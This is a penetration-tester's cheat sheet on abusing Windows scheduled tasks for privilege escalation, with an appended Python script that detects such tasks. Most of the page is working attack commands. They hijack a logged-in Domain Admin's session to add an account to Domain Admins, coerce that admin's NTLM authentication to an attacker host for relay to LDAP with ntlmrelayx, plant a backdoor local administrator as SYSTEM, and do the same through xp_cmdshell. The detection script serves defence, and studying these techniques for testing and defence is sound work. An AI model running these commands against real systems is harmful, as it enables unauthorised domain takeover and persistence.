# schtasks
Can be used for privesc LOL! This article covers it pretty well.
# Queue up a scheduled net.exe privesc task by abusing a DA who is logged in interactively
Check who's logged in (and look for a DA):
Get-Process -IncludeUserName explorer | Select-Object UserName
Queue up the task:
schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
Depending on the Windows system, sometimes you have to swap the single and double quotes above, so, for example:
schtasks /create /tn "TotallyFineTask" /tr "net group 'Domain Admins' lowpriv /add /domain" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
Run it:
schtasks /run /tn "TotallyFineTask"
# Queue up a scheduled HTTP-based privesc task by abusing a DA who is logged in interactively
This is handy when you want to coerce a logged-in DA to do an HTTP call to your attacking box so you can relay to LDAP with ntlmrelayx:
schtasks /create /tn "TotallyFineNotSus" /tr "powershell.exe IWR http://your-kali-ip -UseDefaultCredentials" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
In another window have something like this going:
ntlmrelayx -t ldap://ip.of.a.domaincontroller -debug --escalate-user lowpriv
Then fire the schtask!
schtasks /run /tn "TotallyFineNotSus"
# Queue up a scheduled task when you have NT AUTHORITY\SYSTEM privileges
Sometimes you might get on a box with NT AUTHORITY\SYSTEM permissions and have problems running net.exe to create a backdoor local admin or add a domain user to a local admin group. In cases like these you can use the scheduled task trick, but this time set the /ru to SYSTEM, like so:
schtasks /create /tn "TotallyFineMaintenanceNotABigDeal" /tr "net localgroup administrators SuperSecretLocalAdmin /add" /sc once /st 12:00 /ru SYSTEM /f
TIP
Sometimes escaping single ticks and quotes is hard in xp_cmdshell, so here's another example that works for group shenanigans:
EXEC xp_cmdshell 'schtasks /create /tn "DBMaint" /tr "net group \"Domain Admins\" lowpriv /add /domain" /sc once /st 12:00 /ru "domain\a-domain-admin" /it /f';
# Get details on when the task last ran
Tells you when it last ran, the last result (exit) code, the run-as user, the logon mode, etc.:
schtasks /query /tn "Sometask" /v /fo LIST
# Find all tasks that start with certain characters
For example, if you queued up a bunch of tasks that started with DB you could list them with:
EXEC xp_cmdshell 'schtasks /query | findstr /i "DB"';
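The two queries above are also what a defender runs to spot tasks like the ones earlier on this page. As an added example (not part of the original cheat sheet), here is a Python script that parses `schtasks /query /v /fo LIST` output, flags tasks whose action changes group membership with net.exe, whose interactive-only run-as user differs from the author, or that run once as a privileged account, and filters tasks by name prefix as in the `findstr` one-liner. The field names follow the real LIST format; the sample output, host, task and account names are constructed for the example, and the rule that a task's `Author` is the creating account is an assumption.

```python
import re
from typing import Dict, List, FrozenSet

Task = Dict[str, str]

# Constructed sample of `schtasks /query /v /fo LIST` output (two records).
# Field names match the LIST format; every value here is made up.
SAMPLE_OUTPUT = r"""Folder: \
HostName:                             WS01
TaskName:                             \TotallyFineTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive only
Last Run Time:                        3/14/2024 12:00:00 PM
Last Result:                          0
Author:                               DOMAIN\lowpriv
Task To Run:                          net group "Domain Admins" lowpriv /add /domain
Scheduled Task State:                 Enabled
Run As User:                          DOMAIN\a-domain-admin
Schedule Type:                        One Time Only, At Start Time

Folder: \Microsoft\Windows\Defrag
HostName:                             WS01
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Background only
Last Run Time:                        3/13/2024 1:00:00 AM
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c -h -o -$
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Weekly
"""

# "Key:   value" lines; keys are words separated by spaces or slashes.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z /]*?):\s*(.*)$")
# net.exe / net1.exe invocations that edit group or user membership.
GROUP_CHANGE_RE = re.compile(r"\bnet1?(?:\.exe)?\s+(?:group|localgroup|user)\b", re.I)
DEFAULT_PRIVILEGED: FrozenSet[str] = frozenset({"SYSTEM", "NT AUTHORITY\\SYSTEM"})


def parse_schtasks_list(text: str) -> List[Task]:
    """Split LIST output into one dict per task (records are blank-line separated)."""
    tasks: List[Task] = []
    current: Task = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Folder":
            continue  # folder banner line, not a task property
        current[key] = value
    if current:
        tasks.append(current)
    return tasks


def flag_suspicious(tasks: List[Task], privileged_users: FrozenSet[str] = DEFAULT_PRIVILEGED) -> List[Dict[str, object]]:
    """Return tasks matching any of three rules, with the reasons they fired."""
    priv = {u.upper() for u in privileged_users}
    findings: List[Dict[str, object]] = []
    for t in tasks:
        reasons: List[str] = []
        cmd, run_as = t.get("Task To Run", ""), t.get("Run As User", "")
        author, mode = t.get("Author", ""), t.get("Logon Mode", "")
        if GROUP_CHANGE_RE.search(cmd):
            reasons.append("action edits group/user membership via net.exe")
        # Assumption: Author is the account that created the task, so an /it task
        # whose run-as user differs from its author borrows another user's session.
        if mode.lower() == "interactive only" and run_as and author and run_as.lower() != author.lower():
            reasons.append(f"interactive-only task runs as {run_as} but was authored by {author}")
        if run_as.upper() in priv and t.get("Schedule Type", "").lower().startswith("one time"):
            reasons.append(f"one-time task runs as privileged account {run_as}")
        if reasons:
            findings.append({"task": t.get("TaskName", "?"), "run_as": run_as,
                             "last_result": t.get("Last Result", ""), "reasons": reasons})
    return findings


def tasks_with_prefix(tasks: List[Task], prefix: str) -> List[Task]:
    """Case-insensitive match on the leaf task name (folder path stripped)."""
    return [t for t in tasks
            if t.get("TaskName", "").rsplit("\\", 1)[-1].lower().startswith(prefix.lower())]


if __name__ == "__main__":
    parsed = parse_schtasks_list(SAMPLE_OUTPUT)
    for f in flag_suspicious(parsed, DEFAULT_PRIVILEGED | {"DOMAIN\\a-domain-admin"}):
        print(f["task"], f["run_as"], f["last_result"], "; ".join(f["reasons"]))
```

Feed it real output with `schtasks /query /v /fo LIST > tasks.txt` and extend `privileged_users` with the domain's admin accounts; the one-time-schedule rule is what separates the tasks on this page from the many legitimate SYSTEM tasks Windows ships with.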
# Delete a scheduled task
schtasks /delete /TN "MyTaskName" /F